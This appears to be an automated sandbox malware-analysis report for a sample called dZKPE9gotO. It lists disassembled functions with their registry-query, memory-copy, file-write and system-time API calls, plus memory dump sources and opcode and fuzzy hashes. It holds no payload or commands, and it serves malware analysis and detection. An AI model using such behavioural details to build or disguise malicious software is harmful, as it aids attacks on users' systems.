                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                  • Opcode ID: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
                                                                                                                                                                                                                                                  • Instruction ID: 5bd6a179048394e7de729c67cb4f3c16f8518d2a372a11019db7bb97310c50b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99D05E727402207FC2306769BC0DF17773CEBD5B22FD40535FA05D2160CAB0580587A8
                                                                                                                                                                                                                                                  Function 009CFBEF Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 009CFC23
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC34
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 009CFC78
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction ID: eb0cd6c430f3fad4ec8975645b58de93c01b9249da20b3e08c299df14bdd701f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2219CB1F4461ABBD620CA21C994F63BB6DFF54354B04452AEC4987A01E731F824CBE2
                                                                                                                                                                                                                                                  Function 009C3E75 Relevance: 6.0, APIs: 4, Instructions: 46registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C3E87
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: GetProcessHeap.KERNEL32(?,?,?,?,?,009C3E9E), ref: 009C3F3A
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?,?,?,?,?,?,009C3E9E), ref: 009C3F61
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,009C3E9E), ref: 009C3FE4
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 009C3EBA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 009C3ED8
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C3EE1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcess$QueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 655526730-0
                                                                                                                                                                                                                                                  • Opcode ID: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction ID: e0ec5c66a4119043facc6642acad2286bed9a8aa2b76f86365f704eef1a70b57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05019E74904250AFE7109F60FC0BB6A3BAAEB43B05F44A42DFA459B1A1DBB148549B92
                                                                                                                                                                                                                                                  Function 009B16BF Relevance: 6.0, APIs: 4, Instructions: 42registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009B16DC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020119), ref: 009B16FA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 009B1714
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009B171D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: e6aebe230c5d39b12d0207d97a183d02bd7ba18af64bc9f16786acd6bfcceccc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F03776208258BFD310AB66EC4AE5BBFADEFCAB55F001429F98492110DA319814DBB1
                                                                                                                                                                                                                                                  Function 009C425F Relevance: 6.0, APIs: 4, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C4272
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 009C4299
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 009C42B5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C42BE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction ID: 47999fb9c2ef24e700a6667ccff0e39dde9a7a1dc5ef258325b7a2bfc6137641
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF03A35604150BBD7106B66FD0EE5BBFAEEBC6B11F401028F94596160DA714814DBA1
                                                                                                                                                                                                                                                  Function 004148F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87stringtimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00414951
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                  • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                  • Opcode ID: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction ID: c736f10abd315c62769dbfe5a1a641e1cbd682ca060b05bc7c7f52c3ab47b370
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E2126747142945BCB18AB36981637B7A93EBC2319F05507EF4C6873D1CE398C51C799
                                                                                                                                                                                                                                                  Function 00420E1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00420E27
                                                                                                                                                                                                                                                    • Part of subcall function 00420E92: std::exception::exception.LIBCONCRT ref: 00420E9F
                                                                                                                                                                                                                                                    • Part of subcall function 00420F5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00420E1A,?,0042FAAC,?), ref: 00420FBE
                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00420E44
                                                                                                                                                                                                                                                    • Part of subcall function 00420D34: ___std_exception_copy.LIBVCRUNTIME ref: 00420D52
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::exception::exception$ExceptionRaise___std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: mB
                                                                                                                                                                                                                                                  • API String ID: 2169675119-2452807568
                                                                                                                                                                                                                                                  • Opcode ID: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction ID: e72b37502660f04861b35797f6b59bd50dabb48465353804d4c1080e981a2c3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE0E67560022C778B14BAD6F845CCABBAC9A10750BC0843ABA4856142D7B9E555C7DC
                                                                                                                                                                                                                                                  Function 00412C14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,0040A4F7), ref: 00412CDF
                                                                                                                                                                                                                                                    • Part of subcall function 004125E0: ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,0040A4F7), ref: 00412C79
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,0040A4F7), ref: 00412C8A
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,0040A4F7), ref: 00412CA4
                                                                                                                                                                                                                                                    • Part of subcall function 004122F4: ??3@YAXPAX@Z.MSVCRT(?,004125C6,?,?,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 0041231C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 9b3e77e2d5c6555fac4121ee25edb4a6bace10c9852293726eadeddcd5a41003
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD414A727042509FC315DF29DA8486FBBE6AFD9700719896EE4C9C7304EA74AC45CB91
                                                                                                                                                                                                                                                  Function 009C2E7B Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2F46
                                                                                                                                                                                                                                                    • Part of subcall function 009C2847: ??2@YAPAXI@Z.MSVCRT(?,009C27FB,009C25B7,?,009C25B6,?,?,00643EC0,009C272A,?,009C25FB,009C25B6,00000000,?,?,?), ref: 009C285F
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2EE0
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2EF1
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C), ref: 009C2F0B
                                                                                                                                                                                                                                                    • Part of subcall function 009C255B: ??3@YAXPAX@Z.MSVCRT(?,009C282D,?,00000010,009C25B7,?,009C25B6,?,?,00643EC0,009C272A,?,009C25FB,009C25B6,00000000,?), ref: 009C2583
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 36881a21a2b4fff064ae98c0b49d33baf23705cdda3b67507bee4570617f0287
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6241F772A042559FC325DF28C994E6EBBEAEFD9700B19896DE4C9C7304DA31AC05C792